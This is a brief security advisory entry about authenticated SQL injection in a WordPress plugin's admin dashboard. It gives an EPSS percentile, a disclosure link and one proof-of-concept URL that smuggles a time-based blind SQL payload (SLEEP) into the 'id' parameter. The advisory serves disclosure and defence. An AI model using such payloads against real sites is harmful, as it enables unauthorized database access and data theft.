EPSS
Percentile
45.2%
The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to an authenticated SQL Injections
https://example.com/wp-admin/admin.php?page=pcx_add_sites&mode;=add&id;=1 AND (SELECT 7953 FROM (SELECT(SLEEP(5)))AgUn)
codevigilant.com/disclosure/2021/wp-plugin-post-content-xmlrpc/